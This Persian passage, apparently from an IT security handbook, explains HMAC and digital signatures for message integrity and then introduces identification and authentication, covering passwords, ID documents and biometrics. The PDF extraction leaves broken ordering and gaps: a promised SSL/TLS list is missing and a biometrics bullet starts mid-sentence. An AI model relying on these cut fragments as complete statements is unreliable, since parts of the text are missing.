ﺭﻣﺰﻧﮕﺎﺭﻱ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻭﻗﺘﻲ ﺩﺍﺩﻩﺍﻱ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑـﺮﺍﻱ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﻣـﻲﻓﺮﺳـﺘﻴﺪ،
ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺷﻤﺎ ﻓﺮﺳﺘﺎﺩﻩﺍﻳﺪ -ﻣﺤﺎﻓﻈﺖﺷﺪﻩ ﺍﺯ ﺧﺮﺍﺑﻲ ﺗﺼﺎﺩﻓﻲ ﻳﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﻋﻤﺪﻱ -ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ .ﻳﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ
ﻣﺘﺪﺍﻭﻝ ﺷﺎﻣﻞ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻞ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ -ﺑﺎ ﻣﺤﺎﺳﺒﺔ ﻳﻚ ﺧﻼﺻﺔ ﺭﻣﺰﺷﺪﻩ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺧﻼﺻﻪ ﺑﺎ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻣﺘﻘـﺎﺭﻥ ﻳـﺎ
ﻧﺎﻣﺘﻘﺎﺭﻥ -ﻭ ﺳﭙﺲ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻫﻤﺮﺍﻩ ﻓﺎﻳﻞ )ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻮﺩﺵ ﻫﻢ ﺑﺪﻟﻴﻞ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷـﺪ( ﺍﺳﺖ .ﮔﻴﺮﻧـﺪﻩ ﺧﻼﺻـﻪ ﺭﺍ ﺍﺯ
ﺭﻭﻱ ﻓﺎﻳﻞ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺧﻼﺻﺔ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﺍﻳﻨﺪﻭ ﻣﻄﺎﺑﻘﺖ ﻛﺮﺩﻧﺪ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻡ ﺗـﻀﻤﻴﻦ
ﺷﺪﻩ ﺍﺳﺖ.
ﺗﺎﺑﻊ hashﺗﺼﺪﻳﻖ ﭘﻴﺎﻡ (HMAC) ١٢٥ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻣﻲ ﺍﻧﺘﻘﺎﻝﻳﺎﻓﺘﻪ ﺑﻴﻦ ﺩﻭ ﻃﺮﻑ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣـﺰﻱ
ﻣﺸﺘﺮﮎ ﺑﺎ ﻫﻢ ﺗﻮﺍﻓﻖ ﻛﺮﺩﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ HMAC .ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻳـﻚ ﺗـﺎﺑﻊ ﺧﻼﺻـﻪﭘﻴـﺎﻡ ﺍﺯ ﻫـﺮ ﺩﻭﻱ ﺍﻳﻨﻬـﺎ
ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻣﺜﻞ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳﺮﻱ ﭘﺮﻭﺗﻜﻞ ﻧﻴﺰ ﮔﻨﺠﺎﻧﺪﻩ ﻣﻲﺷﻮﺩ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﻛﻨﺸﻲ ﺭﺍ ﺧﻨﺜـﻲ ﻛﻨـﺪ.
ﻓﺮﺳﺘﻨﺪﺓ ﭘﻴﺎﻡ ،HMAC ،ﻛﻠﻴﺪ ،ﻭ ﻫﺮ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻪ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ HMACﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫـﺪ .ﮔﻴﺮﻧـﺪﻩ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻴﺎﻡ ﻭ ﻛﭙﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ HMAC ،ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ )ﺑﻪ ﻫﻤﺮﺍﻩ ﺍﻃﻼﻋﺎﺕ ﺍﺿـﺎﻓﻪ ،ﻣﺜـﻞ ﺷـﻤﺎﺭﺓ ﺳـﺮﻱ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ( ،ﻭ
ﺳﭙﺲ HMACﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺭﺍ ﺑﺎ HMACﺩﺭﻳﺎﻓﺖ ﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ ﻛﻪ ﺁﻳﺎ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ ،ﻭ ﺍﮔﺮ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ ،ﺁﻧﮕﺎﻩ ﭼﻮﻥ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻋﻮﺽ ﻧﺸﺪﻩ ،ﮔﻴﺮﻧﺪﻩ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺗﻐﻴﻴﺮ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﺍﺳﺖ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻻ HMACﻫﺎ ﺑﺮﺍﻱ ﻣﻘﺎﻭﻡ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ ،ﭼـﻮﻥ ﺑـﻪ ﻧـﺴﺒﺖ ﺍﻣـﻀﺎﻫﺎﻱ ﻣﻌﻤﻮ ﹰ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺴﻴﺎﺭ ﺳﺮﻳﻌﺘﺮ ﻣﺤﺎﺳﺒﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﺍﻧﺪﺍﺯﻩ ﻛﻮﭼﻜﺘﺮ ﻫﺴﺘﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻦ ﻣﻮﺍﺭﺩHMAC ،ﻫـﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﻳـﻚ
ﻻ ﺑﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻛﻠﻴﺪ ﻣﺸﺘﺮﮎ ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺍﺯ ﺧﻄﺮ ﻣﺤﺎﻓﻈﺖ ﺷﻮﺩ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ
ﻻ ﺍﺯ ﺗﺮﻛﻴـﺐ
ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﭼﻨﺪﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧـﺪ .ﺍﻳـﻦ ﭘﺮﻭﺗﻜﻠﻬـﺎ ﻣﻌﻤـﻮ ﹰ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻣﺒﺎﺩﻟﺔ ﻛﻠﻴﺪ ،ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﻭ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﻨﺪ ،ﺑـﻪ ﺍﺿـﺎﻓﺔ
ﻣﺸﺨﺼﺎﺕ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭼﮕﻮﻧﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ،ﺍﺳﺘﻮﺍﺭﻧﺎﻣﻪﻫﺎﻱ ﺗﺒﺎﺩﻟﻲ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ﺟﻠـﺴﻪ ﺑـﻪ
ﺗﻮﺍﻓﻖ ﺧﻮﺍﻫﻨﺪ ﺭﺳﻴﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﭘﺮﻭﺗﻜﻞ SSL/TLSﺍﺯ ﺍﻳﻦ ﺗﺮﻛﻴﺒﺎﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ:
ﻓﺼﻞ ﭘﻨﺠﻢ
ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﻛﻠﻴﺎﺕ
ﺷﻨﺎﺳﺎﻳﻲ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﻳﻚ ﻫﻮﻳﺖ ﺑﺎ ﻳﻚ ﻣﻮﺿﻮﻉ ﺍﺳﺖ .ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺍﻋﺘﺒﺎﺭ ﻳﻚ ﻫﻮﻳﺖ ﺭﺍ ﺑﻪ ﺍﺛﺒﺎﺕ ﻣـﻲﺭﺳـﺎﻧﺪ؛ ﻭ ﺗـﺼﺪﻳﻖ ﺍﺧﺘﻴـﺎﺭ،
ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﺣﻘﻮﻕ ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺑﺎ ﻳﻚ ﻫﻮﻳﺖ ﻣﻲﺑﺎﺷﺪ .ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﺩﻭ ﻣﻔﻬﻮﻡ ﺑﺎﻻ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ .ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﻪ ﻓﺮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ،ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺷـﺒﻜﻪ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻮﻳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺮﻛﺰﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﻭ ﺗﻮﺳـﻂ ﮔﺮﻭﻫﻬـﺎﻱ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﻓﻨﻮﻥ ﺷﻨﺎﺳﺎﻳﻲ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ .ﺳﺎﺩﻩﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺑﺮ ﺍﺳﺎﺱ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ ،ﻭ ﺑﻘﻴـﻪ
ﺑﺮ ﺍﺳﺎﺱ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺸﺨﺼﺎﺕ ﻣﻤﻴﺰﺓ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﺴﻨﺠﻨﺪ .ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ
ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ.
ﻫﻴﭽﻴﻚ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺘﻨﺪ ﻛﻪ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺒﺎﻩ ﺍﻧﺪﺍﺧﺖ ﻭ ﺍﺯ ﺳﺪﺷﺎﻥ ﻋﺒﻮﺭ ﻛـﺮﺩ؛ ﻭ ﺍﻟﺒﺘـﻪ ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ
ﺍﻛﺜﺮ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺍﻳﻨﮕﻮﻧﻪ ﺑﺎﺷﻨﺪ .ﻫﺪﻑ ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻏﻴﺮﻣﻤﻜﻦ ﻛﺮﺩﻥ ﺟﻌﻞ ﻫﻮﻳﺖ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ
ﺟﻌﻞ ﻫﻮﻳﺖ ﻭ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻪ ﻳﻚ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺳﺖ .ﻳﻚ ﻫﺪﻑ ﻣﻬﻢ ﺩﻳﮕﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻌﻴﻴﻦ ﻛﻤـﻲ ﻣﻘـﺪﺍﺭ
ﻣﺨﺎﻃﺮﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺍﺳﺘﻘﺮﺍﺭ ﺳﻴﺴﺘﻢ ﻫﻨﻮﺯ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩ ﺍﺳﺖ؛ ﭼﺮﺍﮐﻪ ﺗﻌﻴﻴﻦ ﻛﻤﻲ ﻣﻘﺪﺍﺭ ﻣﺨﺎﻃﺮﺓ ﺑﺎﻗﻴﻤﺎﻧـﺪﻩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﻛـﻪ
ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺎﺳﺘﻬﺎ ،ﻧﻴﺎﺯ ﻳﺎ ﺗﻤﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺟﺎﻳﮕﺰﻳﻦ ،ﻭ ﺣﺘﻲ ﻣﻴﺰﺍﻥ ﭘﻮﺷـﺶ ﻻﺯﻡ ﺑﻴﻤـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺷﻨﺎﺳﺎﻳﻲ ﻓﻴﺰﻳﻜﻲ
ﺑﻪ ﻳﻚ ﻓﺮﻭﺩﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﺮﻭﺍﺯ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺍﻋﺘﺒﺎﺭﻱ ﻳﻚ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﺔ ﻣﺎﺷﻴﻦ ﺑﻜﺸﻴﺪ ،ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ
ﺑﺎ ﻳﻚ ﻣﺎﺷﻴﻦ ﻛﻪ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﺑﻴﺴﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺭﺯﺵ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﻣﻘﺼﺪ ﺧﻮﺩ ﺭﺍﻧﻨﺪﮔﻲ ﻛﻨﻴـﺪ .ﺗﻨﻬـﺎ ﺗـﻀﻤﻴﻨﻲ ﻛـﻪ ﺁﮊﺍﻧـﺲ ﻛﺮﺍﻳـﻪ
ﻣﺎﺷﻴﻦ ﺍﺯ ﺷﻤﺎ ﺩﺍﺭﺩ ﻛﻪ ﺍﺗﻮﻣﺒﻴﻞ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﺗﻌﻬﺪ ﺷﻤﺎﺳﺖ -ﻭ ﺍﻃﻼﻉ ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺍﮔﺮ ﺧﻠﻒ ﻭﻋﺪﻩ ﻛﻨﻴـﺪ ،ﺁﻧﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﻻ ﺑﻪ ﺯﻧﺪﺍﻥ ﺧﻮﺍﻫﻴﺪ ﺍﻓﺘﺎﺩ.
ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﻨﺪ ﻭ ﺷﻤﺎ ﺍﺣﺘﻤﺎ ﹰ
ﺍﮔﺮ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺷﻤﺎ ﺭﺍ ﻧﻤﻲﺷﻨﺎﺧﺖ ،ﺗﻌﻬﺪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺁﻥ ﻣﻔﻬﻮﻡ ﺧﺎﺻﻲ ﻧﺪﺍﺷﺖ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﺭﺍﻧﻨﺪﮔﻲ ،ﮔﺬﺭﻧﺎﻣﻪ ﻭ ﻳﺎ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ
ﺷﻤﺎ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻛﻨﺎﺭ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳـﺎ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ
ﺩﺯﺩﻱ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ ،ﻭ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻭ ﺷﺮﻛﺖ ﺑﻴﻤﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺍﺯ ﺍﻋﺘﻤﺎﺩﻱ ﮐﻪ ﺑﻪ ﺷﻤﺎ ﮐﺮﺩﻩ ﺁﮔﺎﻩ ﻛﻨﺪ.
ﺩﺭ ﻃﺮﺍﺣﻲ ﻣﺪﺍﺭﻙ ﺷﻨﺎﺳﺎﻳﻲ ﭼﺎﭘﻲ ،ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻓﻴﺰﻳﻜﻲ ﺁﻧﻬﺎ ﻣﻼﻙ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ .ﻳﻚ ﮔﺬﺭﻧﺎﻣﻪ ﺑﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻳـﻚ ﻣـﺪﺭﻙ
ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺏ ﺍﺳﺖ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﻗﺎﺑﻞ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ )ﺟﻨﺲ ،ﻗﺪ ،ﻭﺯﻥ ،ﻋﻜﺲ ،ﺍﻣـﻀﺎ( ،ﺟﻌـﻞ ﺁﻥ ﻣـﺸﻜﻞ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣١٤
ﺍﺳﺖ ،ﺑﺮﺍﺣﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻭ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ،ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ،ﻭ ﻣﺸﻬﻮﺭ ﺻﺎﺩﺭ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﻗﺒـﻞ ﺍﺯ
ﺻﺪﻭ ﹺﺭ ﻣﺪﺭﻙ ،ﻫﻮﻳﺖ ﻓﺮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ .ﺑﺮﻋﻜﺲ ،ﻛﺎﺭﺕ ﻋﻀﻮﻳﺖ ﺩﺭ ﻳﻚ ﺑﺎﺷﮕﺎﻩ ﺭﻭﺯﻧﺎﻣﻪﻧﮕـﺎﺭﻱ ﻭﺍﺟـﺪ ﻫﻴﭽﻴـﻚ ﺍﺯ ﺍﻳـﻦ ﺻـﻔﺎﺕ
ﻧﻴﺴﺖ.
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﺣﺘﻲ ﻓﺮﺍﻣﻮﺵ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻓﺮﺍﺩ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻛﻨﻨـﺪ ،ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ •
ﻛﺎﺭﺑﺮﺩﻫﺎ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﻩﺗﺮﻱ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﻳﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺎﻣﻨﺎﺳﺐ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺑﻞ
ﺣﺪﺱ ﻫﺴﺘﻨﺪ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ.
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﻮﻧﺪ ،ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﻧﺒﺎﻳـﺪ، •
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﭼﻮﻥ ﺑﺮ ﺍﺳﺎﺱ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﭼﻴﺰﻱ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺷﺨﺺ ﺯﻧﺪﻩ ﺍﺳﺖ .ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠﻔـﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ،ﻣﺜـﻞ
ﺗﺼﺎﻭﻳﺮ ﺻﻮﺭﺕ ،ﺷﺒﻜﻴﻪ ،ﻋﻨﺒﻴﻪ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖ ،ﺷﻜﻞ ﻫﻨﺪﺳﻲ ﺩﺳﺖ ،ﺣﺎﻟﺖ ﺻﺪﺍ ،ﺩﺳﺘﺨﻂ ،ﻣﺸﺨﺼﺎﺕ ﺗﺎﻳﭗ ،ﻭ ﻳﺎ ﺍﻟﮕﻮﻫﺎﻱ .DNA
